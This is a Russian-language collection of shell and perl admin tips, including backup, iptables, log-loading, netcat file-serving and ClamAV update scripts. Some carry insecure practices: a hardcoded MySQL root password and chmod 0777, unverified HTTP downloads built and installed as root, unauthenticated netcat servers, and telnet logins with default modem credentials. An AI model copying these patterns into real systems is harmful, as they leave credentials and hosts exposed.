использовать: perl -lape 's/(^From:).*/$1 Nelson Elhage <nelhage\@ksplice.com>/' Который можно свести к perl -lape 's/^From:\K.*/ Nelson Elhage <nelhage\@ksplice.com>/' уточнив, что мы не хотим заменять начало строки. Хэш %ENV К любой переменной системного окружения можно получить доступ через хэш %ENV, что можно использовать для выполнения операций с одинарными кавычками, использованию которых мешают проблемы с экранированием данного символа в shell. Для задачи вывода имен пользователей, содержащих апостроф можно использовать: perl -F: -lane 'print $F[0] if $F[4] =~ /'"'"'/' /etc/passwd но считать кавычки задача неприятная, поэтому данную строку можно свести к: env re="'" perl -F: -lane 'print $F[0] if $F[4] =~ /$ENV{re}/' /etc/passwd Конструкции "BEGIN" и "END" Блоки BEGIN { ... } и END { ... } позволяют организовать выполнение кода до и после цикличной обработки строк файла. Например, для подсчета суммы второго столбца в CSV файле можно использовать: perl -F, -lane '$t += $F[1]; END { print $t }' Опция "-MRegexp::Common" Через указание опции "-M" можно загрузить любой дополнительный perl-модуль. В однострочных скриптах удобно использовать модуль Regexp::Common, содержащий коллекцию типовых регулярных выражений для обработки различных видов данных. Например, для разбора вывода команды ifconfig можно использовать готовые маски для определения IP-адресов: ip address list eth0 | \ perl -MRegexp::Common -lne 'print $1 if /($RE{net}{IPv4})/'

Поиск "проблемных" бинарников в системе Автор: Карбофос [комментарии]

Если в системе по каким-то причинам есть бинарные файлы, а нет внешних библиотек к ним, то этот скрипт поможет достаточно просто найти такие файлы: #!/bin/bash # скрипт для поиска проблемных файлов # список директорий для поиска directory=("/usr/bin/" "/usr/sbin/" "/bin/" "/usr/lib/" "/usr/lib64/") toreplace="=> not found" # Loop through our array. for x in ${directory[@]} do # Find all Files # for i in $(find $x -type f -executable) for i in $(find $x -type f) do # если ldd выдает ошибку "not found".. n=`ldd "$i" | grep found 2>/dev/null` if [ -n "$n" ]; then # echo $i " not found lib: " $n # с небольшой корректировкой, выкидываем "=> not found" echo "$i not found lib(s): $n" | sed "s/$toreplace//g" fi done done

Как избавиться от телнета на модемах для сети СТРИМ Автор: BlackRu [комментарии]

Не все знают, что в некоторых модемах, которые в свое время предлагала компания Точка.ру (СТРИМ) установлен Linux, с работающим телнетом и возможностью входа тех. поддержки. Если мы не хоти пускать поддержку к себе - ни через телнет, ни веб-интерфейс, делаем скрипт автоматического входа и завершения работы telnet, чтобы был доступен только веб-вход. Скрипт написан с учетом работы модема ZTE ZXDSL 831 без использования expect. На модеме не доступны многие команды, включая pkill -HUP telnetd, но доступна команда kill - по id процесса, чего вполне достаточно. Единственным минусом является лишь длительность выполнения скрипта из-за повторного входа, так как выяснять, какой ID у процесса telnetd придется уже на своем компьютере, но без лишних слов - к делу. #!/bin/sh ( sleep 1 echo "admin" sleep 1 echo "123" sleep 1 echo "sh" sleep 1 echo "ps" sleep 1 ) | telnet 192.168.1.1 23&>/home/user/file1; grep telnetd /home/user/file1 | awk '{ print $1 }' > /home/user/file2 cat /home/user/file2 k=$(cat /home/user/file2) ( sleep 1 echo "admin" sleep 1 echo "123" sleep 1 echo "sh" sleep 1 echo "kill $k" sleep 1 ) | telnet 192.168.1.1 23 P.S. Первый процесс всегда серверный, что сильно упрощает работу.

Сохранение версий небольших проектов (доп. ссылка 1) Автор: Марецкий Александр [комментарии]

Допустим Вы пишете скрипт или маленький проект из нескольких файлов. Соответственно возникает желание периодически сохранять результат своих трудов, чтобы в случае необходимости откатиться на шаг или два назад. Для крупного проекта идеально подойдет система контроля версий, а для маленькой задачи подойдет и небольшой shell-скрипт. Для начала использования скрипта достаточно: - переименовать save.sh в просто save - для удобства набора в терминале - разместить его где-нибудь в пределах охвата переменной окружения $PATH (тоже для удобства) - определить в начале скрипта переменной SAVEDIR путь к желаемой директории хранения файлов Вот этот shell-скрипт: #!/bin/sh SAVEDIR="${HOME}/save" # where save backups LIMIT_BYTES=1048576 # set 1Mb limit SCRIPT="save" VERSION="20090903" if test "${1}" then echo "${SCRIPT} version ${VERSION}" >&2 echo "Saves backup of whole current directory" >&2 exit 1 fi err() { echo "${SCRIPT}: ERROR: ${1}" >&2 exit 1 } #### check save directory test -d "${SAVEDIR}" || mkdir "${SAVEDIR}" 2>/dev/null test -d "${SAVEDIR}" || err "failed to create directory: ${SAVEDIR}" #### check size DIR="$(basename $(pwd))" DIR_SIZE_BYTES=$(du -s . | awk '{print $1}') test ${DIR_SIZE_BYTES} -gt ${LIMIT_BYTES} && err "size (${DIR_SIZE_BYTES}) of ${DIR} is greater than limit of ${LIMIT_BYTES}" #### saving cd .. || err "FAILED" tar cpzf "${SAVEDIR}/${DIR}.$(date +%Y%m%d%H%M%S).tar.gz" "${DIR}" || err "failed to create archive" echo "saved: ${DIR}" Например, Вы пишете какой-то хороший ценный скрипт, соответственно предполагаем что у Вас открыт терминал и рабочей директорией является каталог с разрабатываемым скриптом или документов: $ pwd /home/user/tmp/mysmallproject $ ls -l итого 12 -rwxr-xr-x 1 user users 895 2009-09-08 00:52 project.c -rwxr-xr-x 1 user users 170 2009-09-08 00:52 project.h -rwxr-xr-x 1 user users 865 2009-09-08 00:48 project.sh Тогда для создания бэкапа просто наберите "save": $ save saved: mysmallproject Все, копия файлов сохранена. Посмотрим на нее: $ ll /home/user/save/my* -rw-r--r-- 1 user users 1,1K 2009-09-08 00:54 /home/user/save/mysmallproject.20090908005453.tar.gz Видим что скрипт в указанной директории создает архив текущего рабочего каталога и в имени архива дата до секунд. Это удобно, архивы аккуратно выстраиваются по дате. В скрипте еще предусмотрена переменная LIMIT_BYTES, значение которой ограничивает максимальный размер текущей директории (рекурсивно, до архивирования). Это для того чтобы случайно не архивировать что-то крупное.

Автоматическое изменение правил IPTABLES для IP адресов из записей DynDNS (доп. ссылка 1) Автор: zaikini [комментарии]

Возникла задача предоставить сервис для клиентов, использующих внешние динамические адреса. Доступ к сервису ограничен правилами IPTABLES. Клиентам, которым необходимо получить услугу предлагается создать учетную запись на ресурсе dyndns.org, клиент получит доменное имя в виде client.dyndns.org. При каждом изменении ip адреса клиента мы всегда узнаем его адрес по доменному имени. Если мы добавим правило в iptables для этого доменного имени, правило будет работать только для текущего ip адреса клиента и при последующем изменении ip адреса, доступ к сервису будет ограничен. Оригинал решения был найден здесь: http://dave.thehorners.com/content/view/86/65/ , а мы всего лишь доработаем этот скрипт. Создаем несколько каталогов: /root/dynhosts/ - общий каталог /root/dynhosts/zones/ - здесь будем хранить файлы доменных зон клиентов /root/dynhosts/logs/ - лог файлы работы скрипта /root/dynhosts/scripts/ - здесь будет находится сам запускаемый скрипт Создаем лог-файл: touch /root/dynhosts/logs/dynhosts.log Создаем файл зоны клиента: touch /root/dynhosts/zones/client.dyndns.org Создаем сам скрипт /root/dynhosts/scripts/firewall-dynhosts.sh #!/bin/bash # # filename: firewall-dynhosts.sh # NOW=$(date) CHAIN="dynamichosts" # change this to whatever chain you want. IPTABLES="/sbin/iptables" # create the chain in iptables. $IPTABLES -N $CHAIN # insert the chain into the input chain @ the head of the list. $IPTABLES -I INPUT 1 -j $CHAIN # flush all the rules in the chain $IPTABLES -F $CHAIN FILES=`ls --format=single-column /root/dynhosts/zones/` echo $FILES for file in $FILES do HOSTFILE="/root/dynhosts/zones/$file" echo $HOSTFILE # lookup host name from dns tables IP=`/usr/bin/dig +short $file | /usr/bin/tail -n 1` if [ "${#IP}" = "0" ]; then echo "$NOW Couldn't lookup hostname for $file, failed." >> /root/dynhosts/logs/dynhosts.log continue fi OLDIP="" if [ -a $HOSTFILE ]; then OLDIP=`cat $HOSTFILE` echo "CAT returned: $?" fi # save off new ip. echo $IP>$HOSTFILE echo "Updating $file in iptables." echo "Inserting new rule ($IP)" $IPTABLES -A $CHAIN -s $IP/32 -j ACCEPT done exit0 Запускаем скрипт: /root/dynhosts/scripts/firewall-dynhosts.sh iptables: Chain already exists client.dyndns.org CAT returned: 0 Updating client.dyndns.org in iptables. Inserting new rule (213.64.141.6) Проверяем, cat /root/dynhosts/zones/client.dyndns.org 213.64.141.6 /sbin/iptables -nL dynamichosts Chain dynamichosts target prot opt source destination ACCEPT all - 213.64.141.6 0.0.0.0/0 Если такого доменного имени не существует в /root/dynhosts/logs/dynhosts.log была бы запись следующего содержания: Tue Aug 25 09:47:15 MSD 2009 Couldn't lookup hostname for client.dyndns.org, failed. После того как контракт с клиентом истек достаточно удалить файл его зоны из /root/dynhosts/zones/. Осталось добавить выполнение скрипта в крон.

Массовая конвертация имен файлов и каталогов в другую кодировку (доп. ссылка 1) Автор: Марецкий Александр [комментарии]

Если имена большой группы файлов и каталогов не в 7-битной ASCII-кодировке (латиница), то при их переносе между операционными системами с разными локальными кодировками могут возникнуть сложности - нечитаемые знаки вместо привычных имен файлов. Одним из возможных решений будет использование нижеописанного shell-скрипта, которым можно рекурсивно переконвертировать имена сколь угодно большой группы каталогов и файлов из одной кодировки в другую (не боится пробелов в именах): #!/bin/sh # Script for bulk recode files and directories names # to another encodings. # # Usage: # $ brecode.sh <source_dir> <new_dir> # # source encoding. If commented out, then current locale is used #RECODE_FROM="UTF8" # target encoding (mandatory) RECODE_TO="CP1251" #### error function err() { echo >&2 echo "$(basename ${0}): error: ${1}" >&2 echo "exit" >&2 echo >&2 exit 1 } #### check arguments if test "x${1}" = "x" then err "no arguments specified" elif ! test -d "${1}" then err "directory '${1}' not found" elif test "x${2}" = "x" then err "source directory not specified" elif test -e "${2}" then err "object '${2}' already exists" fi #### check utilities for U in find iconv do which ${U} >/dev/null || err "${U} utility not found" done #### recode & copy find "${1}" | while read S do if test ${RECODE_FROM} then N="${2}/$(echo ${S} | iconv -f ${RECODE_FROM} -t ${RECODE_TO})" else N="${2}/$(echo ${S} | iconv -t ${RECODE_TO})" fi if test -d "${S}" then mkdir -p "${N}" || err "mkdir failed" else cp "${S}" "${N}" || err "cp failed" fi done

Определение количества дней в месяце в bash скрипте Автор: Брызгалов Константин [комментарии]

В функции решается задача как определить количество дней в месяце: Необязательные параметры [месяц [год]] days_in_month(){ [ "$#" == "2" ] && date -d "$1/01/$2 +1month -1day" +%d [ "$#" == "1" ] && days_in_month $1 `date +%Y` [ "$#" == "0" ] && days_in_month `date +'%m %Y'` } Или, - односторчник - если нужно узнать количество дней в текущем месяце date -d "`date +'%m/01'`+1month -1day" +%d

Пример функции математической разности float-чисел в обход bc Автор: Alexander Driantsov [комментарии]

function math_minus { num1_point=$(echo $1|sed 's/.*\..*/true/'); num2_point=$(echo $2|sed 's/.*\..*/true/'); if [ $num1_point = "true" ]; then num1_1=$(echo $1|sed 's/\..*$//'); num1_2=$(echo $1|sed 's/^.*\.//'); else num1_1=$1;num1_2=0; fi; if [ $num2_point == "true" ]; then num2_1=$(echo $2|sed 's/\..*$//'); num2_2=$(echo $2|sed 's/^.*\.//'); else num2_1=$2;num2_2=0; fi num1_2_len=${#num1_2} num2_2_len=${#num2_2} if [ $num1_2_len -lt $num2_2_len ]; then len_diff=$((num2_2_len-num1_2_len)) for i in `seq 1 $len_diff`; do diff_nulls="${diff_nulls}0" done num1_2="${num1_2}$diff_nulls" fi; if [ $num1_2_len -gt $num2_2_len ]; then len_diff=$((num1_2_len-num2_2_len)) for i in `seq 1 $len_diff`; do diff_nulls="${diff_nulls}0" done num2_2="${num2_2}$diff_nulls" fi if [ $num1_1 -gt $num2_1 ]; then num1=$((num1_1-num2_1)); fi if [ $num2_1 -gt $num1_1 ]; then num1=$((num2_1-num1_1)); fi num1_len=${#num1} num2_len=$((num1_len+1)) num1="${num1}${num1_2}" num2="${num2}${num2_2}" if [ $num1 -gt $num2 ]; then result=$((num1-num2)) else result=$((num2-num1)) fi num1=${result:0:num1_len} num2=${result:num2_len} result="${num1}.${num2}" if [ "$result" == "." ]; then result=0 fi echo "$result" } Выше превиденный пример является концептуальной демонстрацией, в скриптах для выполнения сложных матеметических операций более подходит bc: echo "scale=5; a=4.1; (a+80)*3 - a^2 + l(a)" | bc -l где через scale задается точность в знаках после запятой, l() - натуральный логарифм, "^" - возведение в степень. Возможности языка bc очень широки, поддерживаются циклы, условия, функции Другая форма использования: var1=2; var2=$(echo "scale=5; $var2 / 2" | bc) Для преобразования формата представления чисел удобно использовать утилиту dc Перевод числа 11 в шестнадцатеричную форму: echo "11 16 o p" | dc в двоичную echo "11 2 o p" | dc Выполнения простых целочисленных операций: echo $(( 20 / 2 )) var1=2; var2=$(( $var1 + 1 ))

Быстрй перенос лог-файлов в MySQL Автор: Alexey Lazarev [комментарии]

Наверняка, каждый сталкивался с задачей переноса лог-файлов из текстовых файлов в различные БД. И, наверняка, каждый столкнувшийся начинал писать собственные скрипты под это дело. Причем большинство виденных мной скриптов основывались на построчном чтении/переносе данных. Данный способ, конечно, хорош и имеет право на существование, но, к сожалению не очень быстр. Но в MySQL существует способ перенести данные из обычных текстовых файлов в БД очень и очень быстро при помощи директивы LOAD DATA INFILE Пример такого скрипта: #!/bin/bash nld='/var/log/squid3' # Путь к лог-файлам nbd='/opt/backup/squid3' # Путь к папке резервного хранения лог-файлов nrc=`squid3 -k rotate` # Команда ротации лог-файлов для данного сервиса nlf='/var/log/logs2mysql/squid.log' # На всякий случай пишем что и когда делали mh='localhost' # Mysql host mu='root' # Пользователь mysql mp='secret' # Его пароль mb='logs' # База данных mt='squid' # Таблица echo `date +"%F %T"` "Начало выгрузки" >> $nlf && \ $nrc && \ for i in `ls $nld | grep access.log.`; do year=`date +"%Y"` month=`date +"%m"` day=`date +"%d"` prefix=`date +"%F-%H"` test -d $nbd/$year/$month/$day || mkdir -p $nbd/$year/$month/$day && \ cat $nld/$i | sed -e 's/\"/\\\"/g' | sed -e "s/\'/\\\'/g" | \ awk ' {print strftime("%F",$1),strftime("%T",$1),$1,$2,$3,$4,$5,$6,$7,$8,$9,$10,$11,$1 $2 $3 $4 $5 $6 $7 $8 $9 $10 $11} ' | \ sed -e "s/ /\t/g" > $nld/prepare.log && \ chmod 0777 $nld/prepare.log && \ mysql -h $mh -u $mu -p$mp -e "LOAD DATA INFILE \"$nld/prepare.log\" REPLACE INTO TABLE $mb.$mt;" && \ cat $nld/$i >> $nbd/$year/$month/$day/$prefix.log && rm $nld/$i && rm $nld/prepare.log done echo `date +"%F %T"` "Конец выгрузки" >> $nlf Поля для таблицы ('Поле'-тип) 'date'-date 'time'-time 'timestamp'-varchar(16)(разные сервисы пишут по разному.Кто-то с милисекундами, кто-то без) 'elapsed'-int(20) 'ip'-varchar(15) 'code'-varchar(20) 'size'-int(20) 'method'-varchar(10) 'url'-varchar(255) 'user'-varchar(255) 'direct'-varchar(25) 'mime'-varchar(25) 'hash'-varchar(255)unique C небольшими изменениями данный скрипт можно приспособить для обработки лог-файлов не только squid, но и других сервисов. Необходимое условие: четкое разграничение полей (можно, поиграться с указанием разграничителей полей в директиве LOAD DATA INFILE). К преимуществам данного скрипта можно отнести огромное быстродействие (п4-3,2 1024Мб ОЗУ 4млн. строк за 10-12 сек.).Также по последнему полю "hash" мы можем уникальным образом идентифицировать строку (при анализе логов за год по squid и net-acct я не обнаружил одинаковых строк).А также гарантированное попадание всех строк в БД (т.к. данные не удаляются при сбое mysql).

HTTP сервер на BASH (доп. ссылка 1) Автор: mahoro [комментарии]

1001-й способ поделиться файлом с коллегами: с помощью простенького HTTP-сервера, код которого умещается в одной строке: :;while [ $? -eq 0 ];do nc -vlp 8080 -c'(r=read;e=echo;$r a b c;z=$r;while [ ${#z} -gt 2 ];do $r z;done; f=`$e $b|sed 's/[^a-z0-9_.-]//gi'`;h="HTTP/1.0";o="$h 200 OK\r\n";c="Content";if [ -z $f ];then($e $o;ls|(while $r n; do if [ -f "$n" ]; then $e "<a href=\"/$n\">`ls -gh $n`</a><br>";fi;done););elif [ -f $f ]; then $e -e "$o$c-Type: `file -ib $f`\n$c-Length: `stat -c%s $f`\n";cat $f; else $e -e "$h 404 Not Found\n\n404\n";fi)';done Этот сервер заработает на Linux, bash и с хоббитовским netcat с патчем sh-c (добавляющим опцию -c, такой netcat есть во многих дистрибутивах, как минимум: в ubuntu, debian и fedora core). После запуска следует зайти по адресу http://ваш_ip:8080. При запросе корневой директории будет выведен список файлов, при запросе файла будут отданы корректные заголовки Content-Length и Content-Type. Также сервер корректно обрабатывает ошибку 404. Просматривать можно содержимой только текущей директории и сменить ее никак нельзя. Подробнее про него можно почитать на http://alexey.sveshnikov.ru/blog/2007/08/30/bash-httpd-2/

Пример мониторинга свободного места на диске. Автор: Hamelion [комментарии]

Наверное, все встречались, когда на том или ином разделе жесткого диска места уже нет. А иногда и просто забываешь проконтролировать место на диске. Данный скрипт написан по принципу настроил и забыл. #!/bin/sh address="root@localhost"; cicl="2 3 4 5 6"; # выставляем в процентах порог заполненного места для каждого раздела, # при котором отсылается сообщение predel[2]=80; # / predel[3]=80; # /usr predel[4]=60; # /var predel[5]=80; # /tmp predel[6]=80; # /home varning="0"; count=0; df -h > /tmp/tmp_df; while read -r FS S Ud A U MO; do let count+=1; FileSystem[$count]=$FS; Size[$count]=$S; Used[$count]=$Ud; Avail[$count]=$A; Use[$count]=$U; MountedOn[$count]=$MO; NUse[$count]=${Use[$count]%"%"}; done < /tmp/tmp_df; table=""; for c in $cicl; do if [[ ${NUse[$c]} -ge ${predel[c]} ]]; then varning="1"; table=$table"\n${FileSystem[$c]} \t${Size[$c]} \t${Used[$c]} \t${Avail[$c]} \t${Use[$c]} \t${MountedOn[$c]}"; fi done shapka="\nFileSystem \tSize \tUsed \tAvail \tUse \tMounted On"; body="Regard admin, please check, place on disk:"$shapka$table; #echo -e $body; if [ $varning -eq "1" ]; then echo -e $body | mail -s"Warning on server" $address; logger -i -p cron.warn -t dfmonitor "Send warning to $address"; else logger -i -p cron.info -t dfmonitor " Place on disk in rate"; fi P.S. записать в cron строчку: 20 5 * * * /sbin/dfmonitor, с утра приходим и получаем отчет :-)

Быстрая передача файла через псевдо-HTTP Автор: mahoro [комментарии]

Когда есть необходимость передать файл с одной машины на другую, а под рукой нет общедоступных ресурсов, можно сделать так: nc -l -p 8080 < file или netcat -l 8080 < file на клиенте достаточно в браузере набрать http://192.168.0.123:8080 Собственно, все. Впрочем, если получатель - блондинка, которая не знает команды File-Save, можно написать так: (echo -e "HTTP/1.1 200\nContent-Disposition: attachment; filename=gena_na.png\nContent-Type: application/octet- stream\nConnection: close\n"; cat vim_mrxvt.png ) | nc -vv -l -p 8080 Но это еще не все. Можно дать доступ к целой директории, написав простой HTTP сервер в одной строке: while true; do nc -vv -l -p 8080 -c '( read a b c; file=`echo $b | sed 's/[^a-z0-9.]//g'`; if [ a$file = "a" ]; then ( ls | (while read f; do echo "<a href=$f>$f</a><br>"; done) ); else cat $PWD/$file; fi )'; sleep 1; done Этот скрипт отдает все файлы, которые есть в текущем каталоге и не позволяет его сменить. В случае, если запрашивается корневая директория, то управление передается своеобразному mod_index - т.е. выводится список файлов-ссылок. В конце добавлена задержка в 1 сек для того, чтобы была возможность убить его нажатием Ctrl-C. См. подробнее http://alexey.sveshnikov.ru/blog/2006/12/23/http-сервер-размером-в-222-байта/

Реализация команды top на Shell Автор: rstone [комментарии]

Должно работать на любом терминале поддерживающем VT Escape последовательности, проверено в Linux, True64 , HP-UX и Соларисе . #!/bin/ksh SLEEP=$1 FIELD=$2 [ -z "$1" ] && SLEEP=10 [ -z "$2" ] && FIELD=1 stty_save=`stty -g` trap "stty $stty_save ; exit; " 2 stty sane clear lines=`tput lines` lines=$((lines-5)) DATE=`date '+%H:%M:%S'` echo "\t\t`tput rev``hostname` TOP $lines PROCESESS at $DATE every $SLEEP seconds`tput sgr0`" tput bold case `uname` in Linux) PS_COMMAND="ps -e -o pcpu= -o cputime= -o user= -o uid= -o pid= -o pmem= -o rssize= -o comm=" HEADER_COMMAND="ps f -p $$ -o pcpu,cputime,user,uid,pid,pmem,rssize,command" ;; HP-UX) UNIX95=1 export UNIX95 PS_COMMAND="ps -e -o pcpu= -o time= -o user= -o uid= -o pid= -o vsz= -o sz= -o comm=" HEADER_COMMAND="ps -p $$ -o pcpu,time,user,uid,pid,vsz,sz,comm" ;; SunOS) HEADER_COMMAND="ps -f -p $$ -o pcpu,time,user,uid,pid,pmem,rss,comm" PS_COMMAND="ps -e -o pcpu= -o time= -o user= -o uid= -o pid= -o pmem= -o rss= -o comm=" ;; *) PS_COMMAND="ps -ef -o pcpu=,cputime=,user=,uid=,pid=,pmem=,rssize=,comm=" HEADER_COMMAND="ps -f -p $$ -o pcpu,cputime,user,uid,pid,pmem,rssize,command" ;; esac $HEADER_COMMAND | head -1 tput sgr0 while [ true ] ; do tput cup 2 0 tput ed $PS_COMMAND | sort -r -n -k"$FIELD" | head -$lines sleep $SLEEP done

Автоматизация обновления антивируса ClamAV Автор: Дима [комментарии]

Возможно поможет кому-то. Разместив в кроне, можно забыть о ручном обновлении, скрипт проверит базы, при необходимости загрузит и соберет обновленную версию и обновит демоны. #!/bin/bash # # ClamAV auto update routine # # Define system variables # DESTPATH="/usr/src" TOREPORT="root" OK="Ok" NO="Failed" echo >> /var/log/`basename $0`.log # # Functions library: logger stores all the events in a log file, # reporter emails error events to admin # function logger () { if [ "$1" != "n" ]; then DATA="$1" CMD="" else DATA=`date +"%b %d %H:%M:%S $2"` CMD="-ne" fi echo $CMD "$DATA" >> /var/log/`basename $0`.log } function reporter () { echo "Error $1 in `basename $0`" | mail -s "`basename $0` reporting error" $TOREPORT quit } # # Check for presence of a link to internet, need to prevent dns errors reporting by syslogd # logger n "Check for link to clamav.net: " IPADDR=`host clamav.net | grep address | cut -d " " -f 4` if [ "$IPADDR" != "" ]; then # # Check availability of the node # PINGER=`ping -c 1 $IPADDR | grep received | cut -d " " -f 4` if [ $PINGER == 1 ]; then logger "$OK" else logger "$NO" reporter 1 fi else logger "$NO" reporter 2 fi # # Run database updater: # VERSION=`freshclam | grep "WARNING: Local" | cut -d " " -f 7` # # If warning message present, check for presence of tarball # if [ "$VERSION" != "" ]; then logger n "Checking presence of tarball: " if [ ! -e $DESTPATH/clamav-$VERSION.tar.gz ]; then logger "$NO" logger n "Fetching mirrors list: " # # No tarball found, start fetching subroutine # First of all, get the mirrors list # MIRROR=( $(wget -q http://prdownloads.sourceforge.net/clamav/clamav-$VERSION.tar.gz?download \ -O /dev/stdout | grep "use_mirror" | cut -d "=" -f 3 | sed -r "s/<[^>]*>//g" | cut -d "\"" -f 1)) if [ $? != 0 ]; then logger "$NO" reporter 3 else logger "${#MIRROR[@]} nodes available" fi # # To prevent overloading of the first node in a mirrors list, select random from the list # NODE=$RANDOM let "NODE %= ${#MIRROR[@]}" logger n "Downloading v$VERSION from ${MIRROR[$NODE]} ($NODE): " wget -q -c -t 5 http://${MIRROR[$NODE]}.dl.sourceforge.net/sourceforge/clamav/clamav-$VERSION.tar.gz \ -O $DESTPATH/clamav-$VERSION.tar.gz >/dev/null 2>&1 if [ $? != 0 ]; then logger "$NO" reporter 4 else logger "$OK" fi else logger "$OK" fi # # Now tarball must be present, and we have to check it's condition # logger n "Checking tarball condition: " gzip -l $DESTPATH/clamav-$VERSION.tar.gz > /dev/null 2>&1 if [ $? != 0 ]; then logger "$NO" # # If we got an error message in checking of a tarball, # erase it, and next time try to download fresh one # rm -f $DESTPATH/clamav-$VERSION.tar.gz reporter 5 else logger "$OK" cd $DESTPATH/ logger n "Unpacking: " # # Ok, gzip reported that's tarball is ok, now unpacking it # tar -xzf clamav-$VERSION.tar.gz >/dev/null 2>&1 if [ $? != 0 ]; then logger "$NO" reporter 6 else logger "$OK" fi logger n "Configuring: " cd $DESTPATH/clamav-$VERSION # # Below are standard procedures of configuring, assembling and installing of the package # ./configure > /dev/null 2>&1 if [ $? != 0 ]; then logger "$NO" reporter 7 else logger "$OK" fi logger n "Compiling: " make > /dev/null if [ $? != 0 ]; then logger "$NO" reporter 8 else logger "$OK" fi logger n "Installing: " make install > /dev/null 2>&1 if [ $? != 0 ]; then logger "$NO" reporter 9 else logger "$OK" fi logger n "Check old daemon: " # # Now we have to swap old smtpd daemon to new # If old daemon is preset - kill'em # PID=`ps -eo pid,comm | grep clamd | sed -r "s/^\ //" | cut -d " " -f 1` if [ "$PID" != "" ]; then logger "$OK" logger n "Killing old daemon ($PID): " kill -9 $PID if [ $? != 0 ]; then logger "$NO" reporter 10 else logger "$OK" fi else logger "$NO" fi logger n "Starting new daemon: " # # Now memory is clear from old daemon and we're running the new one # /usr/local/sbin/clamd & > /dev/null 2>&1 if [ $? != 0 ]; then logger "$NO" reporter 11 else logger "$OK" fi # # Arter all of these, we have to run database updater again # logger n "Checking for newer database: " freshclam > /dev/null 2>&1 if [ $? != 1 ]; then logger "$NO" reporter 12 else logger "$OK" fi # # At this stage, we have new antivirus installed, databases are up to date # and ready to protect our system # fi else logger n "ClamAV is up to date" logger "" fi # # I did not find any benefits to run freshclam in a daemon mode using switch -d. # Running once for a 4, 6 or whatever hours, it takes system resources for 24 hours, 7 days # I think better is to use this script and run it with cron daemon (crontab) as a foreground process # within the same time range # # Dima.

Автоматизация послеустановочной настройки MySQL Автор: Alexey Tsvetnov [комментарии]

#!/bin/sh # # mysql-after-setup # Copyright (c) 2006 Alexey Tsvetnov, vorakl@fbsd.kiev.ua # Version: 1.4 # # Run script after install MySQL to do: # 1. Drop database 'test' # 2. Set MySQL root password # 3. Delete all users and access except root@localhost # # tty echo off stty -echo # enter correct password while true do echo -n "Enter password: " && read pass1 && echo echo -n "Re-enter password: " && read pass2 && echo [ "${pass1}" = "${pass2}" ] && break echo " *** Error!" done # tty echo on stty echo echo "drop database test; delete from db where db like '%test%';\ update user set password=PASSWORD('$pass1') where user='root' and host='localhost';\ delete from user where password='';\ flush privileges;" | mysql -h 127.0.0.1 -u root mysql && echo "Done successfuly." exit 0

Скрипт для создания всех пакетов, требуемых по зависимостям, для порта в ОС FreeBSD Автор: Alexey Tsvetnov [комментарии]

По сути, выполняет действия, аналогичные pkg_create с ключём -R, который появился только в FreeBSD 6.x. Однако данный скрипт позволяет указывать короткое имя порта и каталог, в котором создавать пакеты. А главное, он работает и на тех системах, где pkg_create не поддерживает ключ -R. #!/bin/sh # # pkg_depend # Create all packages (with dependence) needed by some port for FreeBSD 5.x+ # # Version: 1.4 # Copyright (c) 2005,2006 Alexey Tsvetnov, vorakl@fbsd.kiev.ua # # Path to packages directory pkgpath="/usr/ports/packages/All" # Command for get package's version pkgvercmd="pkg_version -v" #pkgvercmd="portversion -v" # more faster than pkg_version getdepend() { [ ! -d $2 ] && echo -n "Creating directory ($2)..." && mkdir -p $2 && echo "Done." cd ${pkgpath} if [ ! -f ${pkgpath}/$1.tbz ]; then echo -n "Creating package ($1)..." pkg_create -yb $1 echo "Done." fi echo -n "Copying package ($1)..." cp -f ${pkgpath}/$1.tbz $2 echo "Done." for LINE in `pkg_info -r $1 | grep Dependency\: | awk '{print $2}'` do if [ ! -f ${pkgpath}/${LINE}.tbz ]; then echo -n "Creating package (${LINE})..." pkg_create -yb ${LINE} echo "Done." fi echo -n "Copying package (${LINE})..." cp -f ${pkgpath}/${LINE}.tbz $2 echo "Done." done } gethelp() { echo "" echo "Usage: `basename $0` <Full/Short pkg_name> <Directory>" echo "" echo "If specify short package name script will get first find entry" echo "" echo "Example: `basename $0` dia-gnome-0.94_4,1 /tmp/pkg/" echo " `basename $0` dia-gnome /tmp/pkg/" echo "" exit 1 } main() { if [ "$2" = "" ]; then gethelp else echo -n "Checking package name ($1)..." if [ "`echo $1 | grep '\-[0-9]'`" = "" ]; then pkgname=`${pkgvercmd} | grep -E '^'$1'-[0-9].*' | awk '{print $1}' | head -1` else pkgname=`${pkgvercmd} | grep $1 | awk '{print $1}' | head -1` fi echo "Done." if [ "${pkgname}" = "" ]; then echo "Package '$1' not found! Exit." exit 2 else getdepend ${pkgname} $2 fi fi } main $1 $2 exit 0

Локальный репозитарий CentOS через HTTP proxy [комментарии]

До появления прямого соединения с интернетом (провайдером был открыт только http), было довольно проблематично поддерживать локальный репозитарий пакетов в актуальном состоянии. Для выхода из подобной ситуации был написан следующий скрипт, который в некотором приближении заменяет rsync. #!/bin/sh cd /opt/rpm-update #mirror_base_url=http://ftp.belnet.be/packages/centos/4.3/os/i386/CentOS/RPMS/ #mirror_update_url=http://ftp.belnet.be/packages/centos/4.3/updates/i386/RPMS/ mirror_base_url=$1 local_rpm_directory=$2 #local_rpm_directory=/var/ftp/pub/centos-4.3/ file_html=./index.html file_rpms=./files.log rm -f $file_html rm -f $file_rpms echo "---------------------------------------------------------" echo "obtaining file list from $mirror_base_url ..." wget -q --no-cache $mirror_base_url echo "ok." cut -d"=" $file_html -f4 | cut -d"\"" -f2 | grep rpm | sort > $file_rpms a=`cat $file_rpms` for cur_rpm in $a do cur_rpm_file=$local_rpm_directory$cur_rpm if [ -e $cur_rpm_file ] then echo "$cur_rpm exist." > /dev/null else echo "downloading $cur_rpm ..." wget -q --no-cache $mirror_base_url$cur_rpm echo "ok." mv ./$cur_rpm $local_rpm_directory fi done rm -f $file_html rm -f $file_rpms и вызов этого скрипта #!/bin/sh echo "***** run4 START ***** " >> /var/log/rpm_update4 /opt/rpm-update/lsus.sh http://ftp.belnet.be/packages/centos/4.3/updates/i386/RPMS/ /var/ftp/pub/centos-4.3/ >> /var/log/rpm_update4 /opt/rpm-update/lsus.sh http://ftp.belnet.be/packages/centos/4.3/os/i386/CentOS/RPMS/ /var/ftp/pub/centos-4.3/ >> /var/log/rpm_update4 /opt/rpm-update/lsus.sh http://ftp.belnet.be/packages/centos/4.3/extras/i386/RPMS/ /var/ftp/pub/centos-4.3/ >> /var/log/rpm_update4 echo "generating headers..." >> /var/log/rpm_update4 yum-arch -q /var/ftp/pub/centos-4.3/ echo "ok." >> /var/log/rpm_update4 echo "generating repo..." >> /var/log/rpm_update4 createrepo -q /var/ftp/pub/centos-4.3/ echo "ok." >> /var/log/rpm_update4 echo 